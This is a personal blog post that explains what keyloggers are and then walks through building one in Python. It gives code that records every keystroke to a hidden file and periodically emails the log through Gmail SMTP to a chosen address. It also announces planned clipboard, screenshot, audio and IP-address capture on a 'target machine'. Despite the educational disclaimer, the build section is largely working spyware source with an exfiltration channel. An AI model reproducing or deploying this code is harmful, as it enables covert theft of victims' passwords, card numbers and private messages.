Keylogger
Keylogger with Spyware functionality
Blog Post by Jerwell Savella - Published at 3/6/2023
Keyloggers are a type of software that has been around for many years, and it is designed to track and record every keystroke that is made on a computer. Keylogging software is a powerful tool that can be used for both good and bad purposes, and it has become a common tool for hackers, employers, parents, and law enforcement agencies.
What is a Keylogger?
A keylogger is a type of software that is installed on a computer or mobile device, and it is used to record every keystroke made by the user. This can include everything from the text entered into a search engine or social media platform to passwords, credit card numbers, and other sensitive information. The software typically runs in the background of the computer, so the user is often unaware that their actions are being monitored.
Keylogger Types and Purpose:
There are two main types of keyloggers: hardware and software. Hardware keyloggers are physical devices that are plugged into a computer, and they record keystrokes onto an internal memory chip. These devices can be difficult to detect, but they require physical access to the computer to install.
Software keyloggers, on the other hand, are programs that can be installed remotely or through a phishing attack. They are often used by hackers to steal sensitive information, such as credit card numbers and passwords. Some employers also use keyloggers to monitor employee productivity and prevent data theft, while parents may use them to monitor their children's online activities.
Is Keylogging Legal?
The legality of keylogging depends on the purpose of its use. In many cases, keylogging is considered illegal if it is used to steal sensitive information, such as passwords and credit card numbers. Employers are typically allowed to use keyloggers on company-owned devices to monitor employee productivity, but they must notify employees beforehand.
How I made my own Keylogger?
Step 1: Import necessary libraries
First, install all the required libraries in order for us to create our keylogger and import all of them into the file.: email.mime.multipart, email.mime.text, email.mime.base, email, pynput.keyboard, time, os, getpass, requests, and PIL.
Step 2: Initialize the keylogger
Initialize the keylogger with file_path, keys_information, toaddr, email_address, password, and timer. The file_path indicates the location where the keystrokes will be stored. The keys_information is the name of the file where keystrokes will be saved. The toaddr and email_address are email addresses to which the keystrokes will be sent. Password is the password to the email address from where the keystrokes are being sent. The timer is the duration after which the email will be sent.
Step 3: Record the keystrokes
Record the keystrokes using the pynput library. The pynput library provides a listener to detect keystrokes. We created two functions for the listener, on_press, and on_release. The on_press function records keystrokes, and the on_release function stops recording the keystrokes.
```python
def on_press(self, key): self.keys.append(key) self.count += 1 current_time = time.time() if self.count >= 1: self.count = 0 self.write_file() if current_time - self.last_email_time >= self.timer: self.send_email() self.last_email_time = current_time def write_file(self): with open(self.file_path + self.extend + self.keys_information, "a") as f: for key in self.keys: k = str(key).replace("'", "") if k == "Key.enter": f.write('\n') elif k.find("Key") == -1: f.write(k) self.keys = []
```
Step 4: Send the keystrokes
Using the email.mime or (Multipurpose Internet Mail Extensions) module, We created a function to send an email After recording the keystrokes, We will send them to the email address provided using the smtplib library. The email is sent as an attachment. And it will contain the .txt files of keystrokes that we recorded. The email will be sent after a specified duration of time using the built-in timer we created.
```python
def send_email(self): fromaddr = self.email_address toaddr = self.toaddr msg = MIMEMultipart() msg['From'] = fromaddr msg['To'] = toaddr msg['Subject'] = "Log File" body = "Body_of_the_mail" msg.attach(MIMEText(body, 'plain')) filename = self.keys_information attachment = open(self.file_path + self.extend + self.keys_information, 'rb') p = MIMEBase('application', 'octet-stream') p.set_payload((attachment).read()) encoders.encode_base64(p) p.add_header('Content-Disposition', "attachment; filename= %s" % filename) msg.attach(p) s = smtplib.SMTP('smtp.gmail.com', 587) s.starttls() s.login(fromaddr, self.password) text = msg.as_string() s.sendmail(fromaddr, toaddr, text) s.quit()
```
To be added:
I'm planning to add more functions to this one in the future including a Clipboard Recorder to save all Clipboard information, an audio/screenshot recorder, System information Recorder that will record system info. including the public and private IP Addresses of the target machine, File encryption to Encrypt Files that will be saved locally on the target machine, and decrypting it when the file has already been sent.
The Bottom Line:
Keyloggers can be a powerful tool for monitoring and tracking computer activity, but they can also be used for malicious purposes. It is important for individuals and organizations to use keyloggers ethically and legally, and to make sure that they are not violating anyone's privacy rights. If you suspect that your computer has been compromised by a keylogger, it is important to take immediate action to protect your sensitive information. This can include running anti-virus software, changing passwords, and seeking the help of a cybersecurity professional.
Note:
This keylogger is intended for educational use only. The use of keyloggers to spy on or invade the privacy of others without their consent is illegal and unethical. Please use this program responsibly and ethically, I assume no responsibility for any harm or damage caused by the misuse of this program.